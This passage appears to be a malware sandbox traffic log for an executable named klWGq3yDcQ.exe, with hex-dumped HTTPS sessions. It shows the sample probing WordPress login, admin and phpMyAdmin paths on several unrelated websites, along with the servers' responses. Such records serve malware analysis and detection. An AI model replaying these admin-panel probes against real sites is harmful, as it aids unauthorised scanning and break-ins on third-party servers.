                                                                                                                                                                                                    2023-11-26 05:59:41 UTC275INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 75 70 67 72 61 64 65 2d 69 6e 73 65 63 75 72 65 2d 72 65 71 75 65 73 74 73 3b 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 55 70 67 72 61 64 65 2c 20 63 6c 6f 73 65 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:41 GMTServer: ApacheContent-Security-Policy: upgrade-insecure-requests;Upgrade: h2,h2cConnection: Upgrade, closeAccept-Ranges: bytesVary: Accept-EncodingTransfer-Encoding: chunkedContent
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC646INData Raw: 32 37 61 0d 0a 2f 61 64 6d 69 6e 2e 70 68 70 4f 4f 50 53 21 20 53 6f 6d 65 74 68 69 6e 67 20 77 65 6e 74 20 77 72 6f 6e 67 2e 20 54 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 68 61 73 20 62 65 65 6e 20 0d 0a 72 65 6d 6f 76 65 64 20 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 64 65 72 20 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 0d 0a 46 65 65 6c 20 66 72 65 65 20 74 6f 20 72 65 61 64 20 74 68 65 20 6d 61 6e 79 20 6f 74 68 65 72 20 61 72 74 69 63 6c 65 73 20 61 76 61 69 6c 61 62 6c 65 20 61 74 20 0d 0a 68 74 74 70 73 3a 2f 2f 77 65 62 73 74 61 6d 70 2e 63 61 0d 0a 3c 21 2d 2d 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: 27a/admin.phpOOPS! Something went wrong. The page you requested has been removed or is currently under maintenance.Feel free to read the many other articles available at https://webstamp.ca...


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    292192.168.2.462844104.26.12.2454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC177OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: hightideinc.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC778INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 76 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC591INData Raw: 31 38 65 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 48 69 67 68 20 54 69 64 65 20 49 6e 63 2e 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 72 63 68 69 76 65
                                                                                                                                                                                                    Data Ascii: 18e9<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; High Tide Inc. &#8212; WordPress</title><meta name="robots" content="max-image-preview:large, noindex, noarchive
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1369INData Raw: 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 6c 31 30 6e 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22
                                                                                                                                                                                                    Data Ascii: ref="https://hightideinc.com/wp-admin/css/forms.min.css?ver=6.4.1" type="text/css" media="all" /><link rel="stylesheet" id="l10n-css" href="https://hightideinc.com/wp-admin/css/l10n.min.css?ver=6.4.1" type="text/css" media="all" /><link rel="stylesheet"
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1369INData Raw: 61 69 6c 20 41 64 64 72 65 73 73 3c 2f 6c 61 62 65 6c 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 6c 6f 67 22 20 69 64 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 22 20 76 61 6c 75 65 20 73 69 7a 65 3d 22 32 30 22 20 61 75 74 6f 63 61 70 69 74 61 6c 69 7a 65 3d 22 6f 66 66 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 75 73 65 72 6e 61 6d 65 22 20 72 65 71 75 69 72 65 64 3d 22 72 65 71 75 69 72 65 64 22 20 2f 3e 0a 3c 2f 70 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 73 65 72 2d 70 61 73 73 2d 77 72 61 70 22 3e 0a 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 5f 70 61 73 73 22 3e 50 61 73 73 77 6f 72 64 3c 2f 6c 61 62 65 6c 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 70 77
                                                                                                                                                                                                    Data Ascii: ail Address</label><input type="text" name="log" id="user_login" class="input" value size="20" autocapitalize="off" autocomplete="username" required="required" /></p><div class="user-pass-wrap"><label for="user_pass">Password</label><div class="wp-pw
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1369INData Raw: 6f 63 75 73 28 29 3b 20 64 2e 73 65 6c 65 63 74 28 29 3b 7d 20 63 61 74 63 68 28 20 65 72 20 29 20 7b 7d 7d 2c 20 32 30 30 29 3b 7d 0a 77 70 5f 61 74 74 65 6d 70 74 5f 66 6f 63 75 73 28 29 3b 0a 69 66 20 28 20 74 79 70 65 6f 66 20 77 70 4f 6e 6c 6f 61 64 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 20 29 20 7b 20 77 70 4f 6e 6c 6f 61 64 28 29 20 7d 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 70 20 69 64 3d 22 62 61 63 6b 74 6f 62 6c 6f 67 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 22 3e 26 6c 61 72 72 3b 20 47 6f 20 74 6f 20 48 69 67 68 20 54 69 64 65 20 49 6e 63 2e 3c 2f 61 3e 20 3c 2f 70 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 69 76 61 63 79 2d 70 6f 6c 69 63
                                                                                                                                                                                                    Data Ascii: ocus(); d.select();} catch( er ) {}}, 200);}wp_attempt_focus();if ( typeof wpOnload === 'function' ) { wpOnload() }/* ... */</script><p id="backtoblog"><a href="https://hightideinc.com/">&larr; Go to High Tide Inc.</a> </p><div class="privacy-polic
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1369INData Raw: 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 76 65 6e 64 6f 72 2f 77 70 2d 70 6f 6c 79 66 69 6c 6c 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 33 2e 31 35 2e 30 22 20 69 64 3d 22 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 68 6f 6f 6b 73 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 63 36 61 65 63 39 61 38 64 34 65 35 61 35 64 35 34 33 61 31 22 20 69 64 3d 22 77 70 2d 68 6f 6f 6b 73 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73
                                                                                                                                                                                                    Data Ascii: ://hightideinc.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0" id="wp-polyfill-js"></script><script type="text/javascript" src="https://hightideinc.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1" id="wp-hooks-js"></script><s
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC318INData Raw: 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 64 3d 22 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 2d 65 78 74 72 61 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 75 73 65 72 50 72 6f 66 69 6c 65 4c 31 30 6e 20 3d 20 7b 22 75 73 65 72 5f 69 64 22 3a 22 30 22 2c 22 6e 6f 6e 63 65 22 3a 22 30 30 37 63 61 39 30 65 65 30 22 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 6a 73 2f 75 73 65 72 2d 70 72 6f 66 69 6c 65 2e 6d 69 6e 2e
                                                                                                                                                                                                    Data Ascii: ></script><script type="text/javascript" id="user-profile-js-extra">/* <![CDATA[ */var userProfileL10n = {"user_id":"0","nonce":"007ca90ee0"};/* ... */</script><script type="text/javascript" src="https://hightideinc.com/wp-admin/js/user-profile.min.
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    293192.168.2.463214104.200.30.314436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC170OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: edgewater.group
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC164INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:41 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC196INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    294192.168.2.462908185.135.132.1054436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC175OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC343INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 32 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:41 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 324Connection: closeLocation: http://www.grantstech.io/wp-login.phpCache-Control: max-age=0Expires: Sun, 26 Nov 2023
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC324INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.grantstech.io/wp-login.php">here</a>.</p><hr><address>Apache/2.4.


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    295192.168.2.46292534.136.104.2554436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC175OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: tiswheels.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC587INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 57 50 20 45 6e 67 69 6e 65 0d 0a 53 65 74 2d 43
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 26 Nov 2023 05:59:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-EncodingVary: Accept-Encodingx-powered-by: WP EngineSet-C
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC6251INData Raw: 31 38 35 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 49 53 20 4f 66 66 72 6f 61 64 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61
                                                                                                                                                                                                    Data Ascii: 185e<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; TIS Offroad &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><script type='text/ja


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    296192.168.2.46294434.208.26.1524436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC177OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: micro-design.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC411INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 37 2e 34 2e 31 35 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 6d 69 63 72 6f 2d 64 65 73 69 67 6e 2e 63 6f 6d 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:41 GMTServer: ApacheX-Powered-By: PHP/7.4.15Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://micro-design.com/wp-json/>; rel="https://api
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC6INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC8192INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 77 69 6e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' /><script>win
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC6INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                                    Data Ascii: 2000
